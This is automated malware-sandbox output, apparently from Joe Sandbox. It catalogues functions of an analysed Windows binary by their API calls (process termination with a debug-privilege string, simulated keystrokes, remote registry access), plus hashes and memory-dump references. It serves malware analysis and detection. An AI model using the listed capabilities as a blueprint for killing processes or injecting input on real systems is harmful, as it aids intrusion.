                                                                                                                                                                                      • Opcode ID: 48266dd8697b7ade67241471444d005e0b8f1978ccafe85c20e87eb8f47ca6d9
                                                                                                                                                                                      • Instruction ID: 6bea119fa0f13893f382813af58cd94eaf1a401a41d944423400fdcf64787787
                                                                                                                                                                                      • Opcode Fuzzy Hash: 48266dd8697b7ade67241471444d005e0b8f1978ccafe85c20e87eb8f47ca6d9
                                                                                                                                                                                      • Instruction Fuzzy Hash: 00718B71508200AFE710EF65DC85F6BB7A9EBC4724F144A1DF996972E1DB30D908CB62
                                                                                                                                                                                      Function 0096B14A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0096B204
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InvalidateRect
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 634782764-0
                                                                                                                                                                                      • Opcode ID: a7f1b605e220b8d170ea9d214766890fefa39ec54463e97ed87be02dd0bab06d
                                                                                                                                                                                      • Instruction ID: fbadb5e0af676e8ac6150e010664225f4116868f3b43448c1e656492e5bab42f
                                                                                                                                                                                      • Opcode Fuzzy Hash: a7f1b605e220b8d170ea9d214766890fefa39ec54463e97ed87be02dd0bab06d
                                                                                                                                                                                      • Instruction Fuzzy Hash: FD51A330609209BFEF30AF28CC99F9E7BA9AB16360F204511F915D62E1F771E9D09B50
                                                                                                                                                                                      Function 0091A599 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0097E9EA
                                                                                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0097EA0B
                                                                                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0097EA20
                                                                                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0097EA3D
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0097EA64
                                                                                                                                                                                      • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0091A57C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0097EA6F
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0097EA8C
                                                                                                                                                                                      • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0091A57C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0097EA97
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1268354404-0
                                                                                                                                                                                      • Opcode ID: 93861744d963c0136e2fa6d8b9361c0a9eb581126b395ea9777b2e9e7ea95938
                                                                                                                                                                                      • Instruction ID: ea39f2bcee359c03601220fab2acd56e8f9ac993ab5ed6ce0021a3676dc29611
                                                                                                                                                                                      • Opcode Fuzzy Hash: 93861744d963c0136e2fa6d8b9361c0a9eb581126b395ea9777b2e9e7ea95938
                                                                                                                                                                                      • Instruction Fuzzy Hash: 51517971B15209AFDB24DF68CC81FAA77B9BB48350F104619F94A972E0D770EC80EB50
                                                                                                                                                                                      Function 0091F6B5 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0097E9A0,00000004,00000000,00000000), ref: 0091F737
                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0097E9A0,00000004,00000000,00000000), ref: 0091F77E
                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0097E9A0,00000004,00000000,00000000), ref: 0097EB55
                                                                                                                                                                                      • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0097E9A0,00000004,00000000,00000000), ref: 0097EBC1
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ShowWindow
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1268545403-0
                                                                                                                                                                                      • Opcode ID: 0241393833aecd4d689e52aa5b8bb7b6fbdacfb4e6fed2c28b207627c7044653
                                                                                                                                                                                      • Instruction ID: 401c2bafcecba3bef2133c96a410dd97b3c70d20e3eda8e57d7dba1211b5f0b7
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0241393833aecd4d689e52aa5b8bb7b6fbdacfb4e6fed2c28b207627c7044653
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7041163271968CDBDB3557399CE8BAA7B996F4A301F284C6DF08B825F1C674A8C0D711
                                                                                                                                                                                      Function 0093CDE6 Relevance: 13.6, APIs: 9, Instructions: 65sleepkeyboardwindowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0093E138: GetWindowThreadProcessId.USER32(?,00000000), ref: 0093E158
                                                                                                                                                                                        • Part of subcall function 0093E138: GetCurrentThreadId.KERNEL32 ref: 0093E15F
                                                                                                                                                                                        • Part of subcall function 0093E138: AttachThreadInput.USER32(00000000,?,0093CDFB,?,00000001), ref: 0093E166
                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 0093CE06
                                                                                                                                                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0093CE23
                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0093CE26
                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 0093CE2F
                                                                                                                                                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0093CE4D
                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0093CE50
                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 0093CE59
                                                                                                                                                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0093CE70
                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0093CE73
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2014098862-0
                                                                                                                                                                                      • Opcode ID: 1b8681a44ce0e23d451499be37a066f3fefbcaf05f350b7231ac2668c68acc8f
                                                                                                                                                                                      • Instruction ID: 64887906e0cd59699c27e34c5ef3403e627658a70eed69145878b067e6b37d73
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1b8681a44ce0e23d451499be37a066f3fefbcaf05f350b7231ac2668c68acc8f
                                                                                                                                                                                      • Instruction Fuzzy Hash: E01104B1524618BEF7112FA08C8EF6A3B2DDF48754F100515F3416B1E0C9F26C00ABA4
                                                                                                                                                                                      Function 0095C604 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0093A857: CLSIDFromProgID.OLE32 ref: 0093A874
                                                                                                                                                                                        • Part of subcall function 0093A857: ProgIDFromCLSID.OLE32(?,00000000), ref: 0093A88F
                                                                                                                                                                                        • Part of subcall function 0093A857: lstrcmpiW.KERNEL32(?,00000000), ref: 0093A89D
                                                                                                                                                                                        • Part of subcall function 0093A857: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 0093A8AD
                                                                                                                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0095C6AD
                                                                                                                                                                                      • _memset.LIBCMT ref: 0095C6BA
                                                                                                                                                                                      • _memset.LIBCMT ref: 0095C7D8
                                                                                                                                                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0095C804
                                                                                                                                                                                      • CoTaskMemFree.OLE32(?), ref: 0095C80F
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • NULL Pointer assignment, xrefs: 0095C85D
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                                                                                      • String ID: NULL Pointer assignment
                                                                                                                                                                                      • API String ID: 1300414916-2785691316
                                                                                                                                                                                      • Opcode ID: 1efe28364f3aaa6186fbeeef6f0b55a1fc13b5407091c55f4d0c35589f7d8abf
                                                                                                                                                                                      • Instruction ID: f2e4ce5c8b6a0b9f84d1d462740b2f42c1580a64141055949edbe1bfcfc54781
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1efe28364f3aaa6186fbeeef6f0b55a1fc13b5407091c55f4d0c35589f7d8abf
                                                                                                                                                                                      • Instruction Fuzzy Hash: 11913AB1D01228AFDB10DFA5DC81FDEBBB9AF48710F10451AF919A7281DB705A45CFA0
                                                                                                                                                                                      Function 00969882 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00969926
                                                                                                                                                                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 0096993A
                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00969954
                                                                                                                                                                                      • _wcscat.LIBCMT ref: 009699AF
                                                                                                                                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 009699C6
                                                                                                                                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 009699F4
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$Window_wcscat
                                                                                                                                                                                      • String ID: SysListView32
                                                                                                                                                                                      • API String ID: 307300125-78025650
                                                                                                                                                                                      • Opcode ID: 047b28fc2dda3eddb3a6abc30feafc8b24e16db2ce015cf1fedb0c167c2e1bc2
                                                                                                                                                                                      • Instruction ID: cb488c3ce12779ef9b2382bad78fd5a514d0a3aeb2638430802081f33b19935c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 047b28fc2dda3eddb3a6abc30feafc8b24e16db2ce015cf1fedb0c167c2e1bc2
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3341B171A04308AFEF219FA4CC85FEE77ACEF49354F10042AF589A7292D6719D84CB60
                                                                                                                                                                                      Function 00961620 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00946F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00946F7D
                                                                                                                                                                                        • Part of subcall function 00946F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00946F8D
                                                                                                                                                                                        • Part of subcall function 00946F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00947022
                                                                                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0096168B
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0096169E
                                                                                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009616CA
                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00961746
                                                                                                                                                                                      • GetLastError.KERNEL32(00000000), ref: 00961751
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00961786
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                      • String ID: SeDebugPrivilege
                                                                                                                                                                                      • API String ID: 2533919879-2896544425
                                                                                                                                                                                      • Opcode ID: abd6db84b79e8f6fa1de7d912cd247beac183e19243cacd8d6490be8655b3bf4
                                                                                                                                                                                      • Instruction ID: 56106ca0d04703693f44d21c3f96decdf2c5428161c97fd51ae878e0784138e9
                                                                                                                                                                                      • Opcode Fuzzy Hash: abd6db84b79e8f6fa1de7d912cd247beac183e19243cacd8d6490be8655b3bf4
                                                                                                                                                                                      • Instruction Fuzzy Hash: A641ABB5744201AFDB04EF54C8E6FADB7A5AF94314F088049F9069F2D2EBB4E844CB91
                                                                                                                                                                                      Function 00946237 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 009462D6
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: IconLoad
                                                                                                                                                                                      • String ID: blank$info$question$stop$warning
                                                                                                                                                                                      • API String ID: 2457776203-404129466
                                                                                                                                                                                      • Opcode ID: 3d166f1e984750cb2c4631820e1daf1be36ed2ab31a915044483f3b470dc8514
                                                                                                                                                                                      • Instruction ID: 28c09d97bfd71987229c0e1226759aa7710cb374ada84698387982fbf0f9b04c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d166f1e984750cb2c4631820e1daf1be36ed2ab31a915044483f3b470dc8514
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8311DAB1248357BEE7059B54DC43EAA73AC9F57734B20002AF511E66C2F7E4BE405266
                                                                                                                                                                                      Function 0094757B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 00947595
                                                                                                                                                                                      • LoadStringW.USER32(00000000), ref: 0094759C
                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 009475B2
                                                                                                                                                                                      • LoadStringW.USER32(00000000), ref: 009475B9
                                                                                                                                                                                      • _wprintf.LIBCMT ref: 009475DF
                                                                                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 009475FD
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 009475DA
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                      • API String ID: 3648134473-3128320259
                                                                                                                                                                                      • Opcode ID: 1aa904af6db30d8200865c2c54b21cce0b952548d2da6aab29f80eef7b85ee2b
                                                                                                                                                                                      • Instruction ID: 7af28ff62652353691e92a0657e279742316e55e84bab3e9516a8b6b14ddb801
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1aa904af6db30d8200865c2c54b21cce0b952548d2da6aab29f80eef7b85ee2b
                                                                                                                                                                                      • Instruction Fuzzy Hash: F60162F2904208BFE711A7D4AD89EEB776CDB04314F4004A2B745D2181EA749E849B31
                                                                                                                                                                                      Function 00962A0A Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0090CAEE: _memmove.LIBCMT ref: 0090CB2F
                                                                                                                                                                                        • Part of subcall function 00963AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00962AA6,?,?), ref: 00963B0E
                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00962AE7
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: BuffCharConnectRegistryUpper_memmove
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3479070676-0
                                                                                                                                                                                      • Opcode ID: b59ee8649b7a2f5733f1084c001d64b05b0d18fa417de4f0d43604cea7568ccd
                                                                                                                                                                                      • Instruction ID: e15e8e4ff9a67141d10ae3b2f8ae13374171e4ffd8b473164194f63b607519c0
                                                                                                                                                                                      • Opcode Fuzzy Hash: b59ee8649b7a2f5733f1084c001d64b05b0d18fa417de4f0d43604cea7568ccd
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F919775204601AFCB00EF64C891B6EB7E9FF88310F14884DF9969B2A2DB34E945DF42
                                                                                                                                                                                      Function 0092B72C Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • __mtinitlocknum.LIBCMT ref: 0092B744
                                                                                                                                                                                        • Part of subcall function 00928A0C: __FF_MSGBANNER.LIBCMT ref: 00928A21
                                                                                                                                                                                        • Part of subcall function 00928A0C: __NMSG_WRITE.LIBCMT ref: 00928A28
                                                                                                                                                                                        • Part of subcall function 00928A0C: __malloc_crt.LIBCMT ref: 00928A48
                                                                                                                                                                                      • __lock.LIBCMT ref: 0092B757
                                                                                                                                                                                      • __lock.LIBCMT ref: 0092B7A3
                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,009B6948,00000018,00936C2B,?,00000000,00000109), ref: 0092B7BF
                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(8000000C,009B6948,00000018,00936C2B,?,00000000,00000109), ref: 0092B7DC
                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(8000000C), ref: 0092B7EC
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1422805418-0
                                                                                                                                                                                      • Opcode ID: c2b1b0a8e3db2269c9a3f814f6c98791ab2a01c61f3b914d4f66fc477f92aaec
                                                                                                                                                                                      • Instruction ID: 1f5f9585aa32a269d4f5ce96dad5b47117d823c3206b15c987cb0c1500f846ac
                                                                                                                                                                                      • Opcode Fuzzy Hash: c2b1b0a8e3db2269c9a3f814f6c98791ab2a01c61f3b914d4f66fc477f92aaec
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B412671D112368BEB10DFA8F8447ACB7ECBF81335F248229E429AB2D5D7749941CB90
                                                                                                                                                                                      Function 0094A1B7 Relevance: 12.1, APIs: 8, Instructions: 100fileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 0094A1CE
                                                                                                                                                                                        • Part of subcall function 0092010A: std::exception::exception.LIBCMT ref: 0092013E
                                                                                                                                                                                        • Part of subcall function 0092010A: __CxxThrowException@8.LIBCMT ref: 00920153
                                                                                                                                                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 0094A205
                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 0094A221
                                                                                                                                                                                      • _memmove.LIBCMT ref: 0094A26F
